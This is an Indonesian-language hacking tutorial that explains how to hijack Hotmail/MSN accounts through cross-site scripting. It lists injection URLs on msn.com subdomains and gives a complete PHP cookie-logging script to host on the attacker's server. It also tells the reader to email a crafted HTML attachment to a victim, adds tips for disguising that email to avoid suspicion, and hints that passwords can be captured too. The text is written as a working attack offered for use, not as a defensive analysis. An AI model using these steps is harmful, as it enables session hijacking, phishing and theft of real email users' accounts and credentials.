Ngehack Hotmail

Apa itu Hotmail? Siapa sih yang tidak tahu Hotmail? Sebuah website email provider yang bisa dikatakan terbesar di dunia. Dia juga the only provider MSN Messenger.

Kerapkali, perusahaan yang berada dibawah bimbingan Microsoft ini dikatakan sangatlah aman, namun, benarkah semua persepsi itu??

Disini kita akan kita bahas mengenai sebuah XSS pendek yang bisa kita lakukan pada Hotmail email provider.

Bagaimana cara penggunaan exploit nya?
Singkat saja .. Karena saya lagi malas dan memang ini singkat koq ..
Pada dasarnya, pada kebanyakan website yang memiliki email service. Adanya 1 saja page pada entire website mereka yang memiliki celah XSS, akan berakibat FATAL .. !!! Tidak percaya?? Mari kita lihat ..

Belum lama ini tersebutlah sebuah exploit yang diketemukan oleh Nama tidak diketahui, namun script ini sudah disebarkan di beberapa tempat tertentu termasuk Astalavista dan beberapa tempat lain, tanpa adanya credit murni pada si penemu XSS, berikut adalah codenya:
CODE

http://sprite.msn.com/Comments.asp?Return=">


Selain itu juga menurut penelitian Th0R, ada juga code ini:
CODE

http://auction.jp.msn.com/dap/sv/list1?keyword=">


Nah .. Kita bisa gunakan 2 itu untuk ngehack ..
Percaya gak??
65.gif

Mari kita buktikan ..

Cara kerjanya:
Seperti biasa ..
Mulailah dengan membuat file bernama c.php yang berisikan code ini:
CODE

$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n"); fclose($fl); ?>

Kemudian host kan lah itu script di tempat hosting anda .. Ingat !!! Harus support php .. Jangan lupa juga untuk membuat sebuah file text bernama log.txt yang tidak berisi kan apa apa .. Hostingkan juga di tempat yang sama dengan PHP code anda ..

Lalu buatlah sebuah file yang bernama a.html, yang berisikan:
CODE

Click here

Atau

CODE

Click here

Setelah itu ..
Bukalah email anda ..
Dan emailkan sebuah email yang memiliki attachment file HTML anda diatas tersebut. Setelah itu kirimkan lah ke victim anda ..
Disaat dia membuat attachment file dan melakukan click pada link "Click Here", maka cookies mereka akan ter-log ke dalam file log.txt anda di hosting.

Sekian~

Catatan Tambahan:
- Anda bisa merubah kode kode XSS diatas dengan berbagai code yang anda mengerti. Atau dengan keylogging XSS codes yang ada pada Section XSS di http://www.sate.name
- Anda bisa mengisikan HTML code dengan berbagai gambar atau code tertentu, sehingga berkesan lebih kearah informational letters, untuk menghindari kecurigaan.
- Pada website MSN masih ada beberapa tempat lain yang bisa dikatakan rawan XSS. Serangan tidak hanya ada disana ..

Sedikit Bocoran:
- Dengan sedikit modifikasi tertentu, anda bisa mendapatkan plain-text password atau informasi penting lain sang pengguna email.

NB: Kalau kurang ngerti, boleh lgsg ditanyakan disini. Maklum. Gw lagi agak mumet nih .. Lagi sakit kepala .. Kek gak isa mikir dengan baik ..

Tutorial Credit Goes to: Th0R
MSN XSS Goes to: The Author & Th0R
Special Thanks to: Someone i loved so much .. Thanks for everything ^^ Shoutz to: ToFlu, lanosian, parahlo, fLute, Jourdan, mamasbejoe a.k.a premature, koJom, High, StanZ, JepZ, Eve, KucipA, dan segenap Member SATE - Security Advisory TEam

>>> http://www.sate.name <<<

Thanks.
Th0R
Source: JASAKOM Information Center